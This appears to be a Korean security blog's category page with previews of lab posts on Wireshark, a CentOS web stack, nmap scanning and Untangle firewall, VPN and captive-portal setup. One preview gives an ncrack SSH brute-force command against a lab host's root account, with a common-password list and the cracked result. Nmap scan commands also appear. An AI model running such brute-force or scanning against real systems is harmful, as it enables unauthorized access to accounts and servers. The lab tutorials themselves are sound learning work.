본문 바로가기

Security

(11)
와이어샤크 꿀팁 | 시간형식 변경 | 포트 번호 같이 보기 | Columns 설정| 그래프 만들기 | 패킷 시각화 # 시간 형식 변경 [VIEW] - [Time Display Format] 에서 선택할 수 있습니다. # 비교 사진 기본 형식이 볼 때 더 간단해보이지만, 패킷을 저장해뒀다가 분석을 할 경우에는 자세한 시간 확인이 어렵다는 단점이 있어요. 이 점 고려해서 선택하시면 될 것 같습니다. 기본형식 (Secondds Since Beginning of Capture) Date and Time of Day # 포트 번호 같이 보기 및 Columns 설정 [Edit] - [Preferences] 수정 결과 # 패킷 그래프 만들기 [Statistics] - [I/O Graph] 결과 패킷의 정보를 간단하게 시각화해서 볼 수 있습니다.
CentOS에 APM 구축하기 | 아파치 서버 구축 | PHP 설치 | MariaDB 설치 | phpmyadmin 설치 및 실행 APM은 apache + PHP + MariaDB(Mysql)의 앞 글자를 딴 말로, 웹서버 구축에 많이 쓰이는 프로그램 세트를 말합니다. APM 에 phpmyadmin까지 설치해봅니다. 1. MariaDB 10.4 설치 설치를 위하여 yum의 repo를 작성해줍니다. vi /etc/yum.repos.d/MariaDB.repo 아래 내용을 작성해줍니다. [mariadb] name = MariaDB baseurl = http://yum.mariadb.org/10.4/centos7-amd64 gpgkey = https://yum.mariadb.org/RPM-GPG-KEY-MariaDB gpgcheck = 1 레포리스트를 업데이트 해주고, 설치를 시작합니다. $ sudo yum repolist $ sudo y..
ncrack을 활용한 SSH(22번포트) 암호 크랙 @kali 에서 ncrack 최신버전으로 업데이트하기 apt-get install ncrack # vim pass.txt (많이 사용하는 암호 목록) passwd dkagh1. dkagh2. P@ssw0rd qwer1234 computer security passwd! # ncrack -v --user root -P pass.txt 192.168.2.10:22 (공격할 IP: 포트) ncrack -v --user root -P pass.txt 192.168.2.10:22 Starting Ncrack 0.7 ( http://ncrack.org ) at 2020-08-28 03:02 KST Discovered credentials on ssh://192.168.2.10:22 'root' 'qwer1234' ..
NMAP을 활용한 네트워크 스캐닝 | 패킷 확인해보기 | IPS에서 로그 확인하기 1. Scanning Tool: nmap ARP 스캐닝은 맥 주소를 참고하니, 같은 네트워크 대역대만 스캔 가능 IP, ICMP 스캐닝은 라우팅이 가능한 네트워크 대역대라면 전부 가능 TCP 스캐닝은 방화벽에 걸릴 가능성이 높다 #nmap -v -sn 192.168.1.0/24 (live scan) #nmap -v -A 192.168.1.83 (port scan) #nmap -v -A 192.168.1.5 #nmap -v -sn 192.168.2.0/24 #nmap -v -A 192.168.2.10 #nmap -v -A 192.168.2.5 # nmap -v -sn 192.168.1.0/24 스캐닝 Nmap scan report for 192.168.1.82 [host down] Nmap scan rep..
Untangle 을 활용하여 특정 사이트 차단하기 # Untangle 에서 Web Filter 어플을 설치해줍니다. 요거는 14일만 무료로 사용가능합니다. # 접속해서 Block Site 탭을 누릅니다. # 차단 할 사이트를 추가해줍니다. # daum.net 추가하고, 저장 # 클라이언트에서 다음(daum.net)에 접속하면 아래와 같은 필터 창이 보입니다. # 차단 내역 역시 Reports 에서 확인 가능합니다. # 쉽고 편한 사이트 차단을 진행해보았습니다.
Untangle 을 활용한 방화벽 실습 # 실습문제 # 정책1 사내망 192.168.1.0/24 직원 -> 사내서버망 웹서버 192.168.2.10 로 웹서비스 (80, 443)만 허용하고 그외의 서비스 거부하는 정책 # 정책2 사내망 192.168.1.0/24 -> 사내서버망 192.168.2.0/24 ssh 서비스를 거부 함. 단, 서버 담당자 (WIN7)만 SSH 서비스 허용 (IP, HOSTNAME 기준으로 담당자 허용가능) # 정책3 사내서버망 192.168.2.0/24 직원 -> 사내직원망 192.168.1.0/24에 접근 거부 * 사내망 192.168.1.0/24 과 사내서버망 192.168.2.0/24은 인터넷은 되어야 함. # 정책이 여러항목일 경우, 우선순위가 중요함. (RULE ID) 첫번째 정책 부터 순서대로, 조건과 비..
Untangle 을 활용한 VPN 서버 설정 # VPN 서버 설정 # Untangle Apps 에서 OpenVPN을 다운받아 설치합니다. OpenVPN은 무료 서비스입니다. # 설치하면 disalbed 되어있는데, 전원을 켜 활성화 합니다. # Server 로 들어가 상세 설정을 합니다. 1. 서버를 켜고 (Server Enabled) 2. Address 를 확인하고 (VPN 연결에 사용될 네트워크주소) 3. User 인증(로그인) 할지 말지 선택 4. User 인증을 할거면 방법은? --> 로컬 디렉터리로! # 로그인 설정을 Local Directory 로 해주었다면, Local Directory 에서 VPN 사용자를 새로 생성합니다. (그냥 있는 사용자로 사용해도 된다.) # Config 에서 Local Directory 로 이동! # Add ..
Untangle을 활용하여, 웹 서비스 접근 시 사용자인증(로그인) 하도록 설정하기 # Untangle 에서 Captive Portal 어플리케이션을 깔아줍니다. 설치는 Untangle 로고 바로 아래의 Install Apps 에서 하실 수 있습니다. # Captive Portal 어플에 들어가서 Capture Rules 를 설정합니다. 기본 설정을 Enable 해줍니다. # Captive Page에서 Basic Login 을 하도록 설정합니다. 이것 역시 기본 설정대로 저장해주었습니다. 우측 하단의 Save 버튼을 누르면, Settings saved 라는 문구가 나타납니다. 모든 단계에서 저장을 꼭 해주세요. # 이제 거의 다왔어요. User Authenticcation 에서 Authentication Method를 Local Directory 로 설정해주세요. 이걸로 Captive ..